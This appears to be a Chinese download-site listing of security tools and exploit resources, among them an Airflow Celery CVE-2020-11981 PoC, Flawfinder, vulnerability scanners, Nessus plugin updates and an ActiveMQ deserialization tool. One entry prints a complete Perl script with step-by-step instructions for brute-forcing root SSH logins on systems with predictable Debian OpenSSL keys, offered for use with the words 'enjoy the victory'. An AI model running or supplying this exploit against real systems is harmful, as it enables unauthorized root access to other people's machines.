Apache Airflow Celery 消息中间件命令执行漏洞CVE-2020-11981POC脚本 Airflow 是一个使用 python 语言编写的 data pipeline 调度和监控工作流的平台。Airflow 是通过 DAG(Directed acyclic graph 有向无环图)来管理任务流程的任务调度工具, 不需要知道业务数据的具体内容,设置任务的依赖关系即可实现任务调度。 这个平台拥有和 Hive、Presto、MySQL、HDFS、Postgres 等数据源之间交互的能力,并且提供了钩子(hook)使其拥有很好地扩展性。除了一个命令行界面,该工具还提供了一个基于 Web 的用户界面可以可视化管道的依赖关系、监控进度、触发任务等。 Apache Airflow是一款开源的,分布式任务调度框架。在其1.10.10版本及以前,如果攻击者控制了Celery的消息中间件(如Redis/RabbitMQ),将可以通过控制消息,在Worker进程中执行任意命令。
1
1.订单需要多重效验,如下图所演示 2.订单数值较大时需要人工审核订单信息,如下图所演示 3.我只是提到两个非常简单的预防思路,第二个甚至还有一些不足之处 1.
2022-12-08 20:50:56 1.56MB Web安全测试中常见逻辑漏洞解析
1
Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit 解开Debian OpenSSL内的ssh钥匙只有65.536可能性,导致唯一的熵是引起钥匙的过程的Pid. 这导致以下perl脚本程序可以使用与暴力的预先计算好的ssh钥匙。如果钥匙在一个非被修补的debian或其他系统指南被安装配置,它就会运作。 在一个未修补的系统中,不需要Debian,做以下工作: keys provided by HD Moore - http://metasploit.com/users/hdm/tools/debian-openssl/ 1. Download http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2 http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2 2. 提取它对应目录 3. 输入/root/.ssh/authorized_keys与2048位的SSH RSA钥匙,引起在Upatched Debian (这是这盘剥将增殖比的钥匙 eak) 4. 运行perl脚本程序并且给它提取bzip2的位置. CODE: #!/usr/bin/perl my $keysPerConnect = 6; unless ($ARGV[1]) { print "Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n"; print "Example: ./exploiter.pl /root/keys/ 127.0.0.1\n"; print "By hack01[at]live[dot]cn\n"; exit 0; } chdir($ARGV[0]); opendir(A, $ARGV[0]) || die("opendir"); while ($_ = readdir(A)) { chomp; next unless m,^\d+$,; push(@a, $_); if (scalar(@a) > $keysPerConnect) { system("echo ".join(" ", @a)."; ssh -l root ".join(" ", map { "-i ".$_ } @a)." ".$ARGV[1]); @a = (); } } 5. 在几分钟(少于20分钟)以后享受胜利结果吧!
2022-12-05 15:02:46 47.9MB 漏洞复现
1
关于 这是“探伤者”。 Flawfinder 是一个简单的程序,可以扫描 C/C++ 源代码并报告潜在的安全漏洞。 它可以是检查软件漏洞的有用工具,也可以更广泛地作为对静态源代码分析工具的简单介绍。 它的设计易于安装和使用。 Flawfinder 支持 Common Weakness Enumeration (CWE) 并正式与 CWE 兼容。 有关更多信息,请参阅 平台 Flawfinder 旨在作为命令行工具在 Unix/Linux/POSIX 系统(包括 Cygwin、基于 Linux 的系统、MacOS 和各种 BSD)上使用。 它需要 Python 2.7 或 Python 3。 安装 如果你只是想使用它,你可以使用 Python 的“pip”或系统的包管理器(flawfinder 有许多系统的包)安装缺陷查找器。 它还支持按照通常的make install源安装约定轻松安装
2022-12-04 12:28:49 112KB Python
1
基于浏览器爬虫golang开发的web漏洞主动(被动)扫描器.zip
2022-12-01 15:17:55 298KB golang
渗透测试常用书签整理(信息收集、漏洞整理、渗透工具、加密解密)
2022-11-29 12:00:27 3KB 渗透测试 书签
1
网络安全学习笔记包含sql注入,ssh暴力破解,web漏洞扫描,xss扩展攻击,文件上传攻击等
2022-11-28 12:00:30 34.97MB 网络安全
1
对于一些网络安全管理人员、或者运维工程师等人来说,拥有趁手而实用性强的安全测试软件是很有必要的,Appscan就是这样一款软件。它可以支持多种分析方法,不同的分析方法适用于不同的分析要求和条件,可分析范围很广泛,因此适用人群也较为广泛,一些工程师或者开发人员也比较喜欢这个软件
2022-11-27 21:00:32 675.74MB 扫描测试工具
1
nessus2022-11-23漏洞更新包all-2.0.tar.gz ,以把插件包上传到服务器后, 执行/opt/nessus/sbin/nessuscli update 插件包文件路径 nessus2022-11-23漏洞更新包all-2.0.tar.gz ,以把插件包上传到服务器后, 执行/opt/nessus/sbin/nessuscli update 插件包文件路径 nessus2022-11-23漏洞更新包all-2.0.tar.gz ,以把插件包上传到服务器后, 执行/opt/nessus/sbin/nessuscli update 插件包文件路径 nessus2022-11-23漏洞更新包all-2.0.tar.gz ,以把插件包上传到服务器后, 执行/opt/nessus/sbin/nessuscli update 插件包文件路径 nessus2022-11-23漏洞更新包all-2.0.tar.gz ,以把插件包上传到服务器后, 执行/opt/nessus/sbin/nessuscli update 插件包文件路径 nessus2022-11-23漏洞更新包all-
2022-11-27 14:18:41 322.97MB nessus nessus插件
1
ActiveMQ反序列化漏洞(CVE-2015-5254)漏洞利用工具,说明文档已存在请进行查看
2022-11-25 20:00:27 48.32MB 反序列化 ActiveMQ 安全
1